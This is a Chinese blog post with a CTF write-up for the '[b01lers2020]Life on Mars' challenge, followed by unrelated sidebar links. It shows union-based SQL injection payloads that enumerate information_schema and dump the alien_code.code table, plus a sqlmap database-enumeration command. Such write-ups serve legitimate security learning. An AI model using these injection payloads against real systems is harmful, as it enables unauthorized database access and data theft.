当前位置:网站首页>[b01lers2020]Life on Mars
[b01lers2020]Life on Mars
2022-08-03 21:55:00 【茶经新读.】
[b01lers2020]Life on Mars

大体查看一下没啥重要的点,f12也没发现什么,抓包发现GET /query?search=&amazonis_planitia&{}&_=1659321817406,点击不同的标题,amazonis_planitia所在内容也会随着变化


尝试在本页面进入其所出现的页面
![]()

发现有很多数据,尝试一下联合查询:/query?search=amazonis_planitia union select 1,2,发现有回显

查一下库:/query?search=amazonis_planitia union select version(),database()

查表:/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='aliens'

查完之后发现回显的东西正是一开始的页面的各个标题,查询一下表的字段:/query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name='amazonis_planitia',也没什么特别的地方
使用sqlmap工具扫描一下
sqlmap下载:sqlmap: automatic SQL injection and database takeover tool
python2 sqlmap.py -u http://xxxxxxxx.node4.buuoj.cn:81/query?search=amazonis_planitia --dbs

发现改网页有三个数据库,自己查询一下:/query?search=amazonis_planitia union select 1,group_concat(schema_name) from information_schema.SCHEMATA,确实有三个数据库

刚才已经查询过aliens了并没有发现什么,继续查询一下alien_code的表:/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='alien_code'

查询code表的字段:/query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name='code'

查询一下内容:/query?search=amazonis_planitia union select group_concat(id),group_concat(code) from alien_code.code

至此完结,撒花
边栏推荐
- JPA Native Query(本地查询)及查询结果转换
- CAS: 1192802-98-4 _uv cracking of biotin - PEG2 - azide
- 九种方式,教你读取 resources 目录下的文件路径
- [kali-vulnerability scanning] (2.1) Nessus download and installation (on)
- CAS:908007-17-0_Biotin-azide _生物素叠氮化物
- CAS:1260586-88-6_生物素-C5-叠氮_Biotin-C5-Azide
- 2022年全国职业院校技能大赛网络安全 B模块 B-1任务一:主机发现与信息收集 国赛原题
- 488. Zuma Game
- 全球观之地理部分
- 测试2年6.5K,每天“911”,我的心酸经历只有我自己知道···
猜你喜欢

【kali-漏洞扫描】(2.1)Nessus下载安装(上)

线程池的高级应用技巧核心解读

nxp官方uboot移植到野火开发板PRO(修改LCD部分和网络部分)

CAS:1620523-64-9_Azide-SS-biotin_生物素-二硫-叠氮

AI首席架构师13-AICA-智能文档分析技术在行业场景中的应用

XSS practice - cycle and two cycle problem at a time

HCIP第十四天

CAS:122567-66-2_DSPE-Biotin_DSPE-Biotin

字节跳动软件测试岗,前两面过了,第三面HR天坑,结局透心凉...

D - Project Planning--二分
随机推荐
主板设计中:网络变压器与RJ45网口之间应该保持什么样的距离?
【进阶自动化测试】一文1000教你如何用Postman做接口自动化测试
2022年全国职业院校技能大赛网络安全 B模块 B-1任务一:主机发现与信息收集 国赛原题
DO280管理和监控OpenShift平台--资源限制
关于GPIO你真的懂了吗?这篇文章都给你整理好了
LVS负载均衡集群
测试2年6.5K,每天“911”,我的心酸经历只有我自己知道···
XSS holes emersion
FVCOM 3D Numerical Simulation of Hydrodynamics, Water Exchange, Dispersion and Transport of Oil Spills丨FVCOM Model Watershed, Numerical Simulation Method of Marine Water Environment
HCIP第十六天
超级实用网站+公众号合集
CAS:1797415-74-7_TAMRA-Azide-PEG-Biotin
IDaaS 是什么?一文说清它的价值
488. Zuma Game
[kali-vulnerability exploitation] (3.2) Metasploit basics (on): basic knowledge
CAS:1620523-64-9_Azide-SS-biotin_biotin-disulfide-azide
4. 模块化编程
Diazo Biotin-PEG3-DBCO|重氮化合物修饰生物素-三聚乙二醇-二苯并环辛炔
HCIP第十五天
线上服务器老是卡,该如何优化?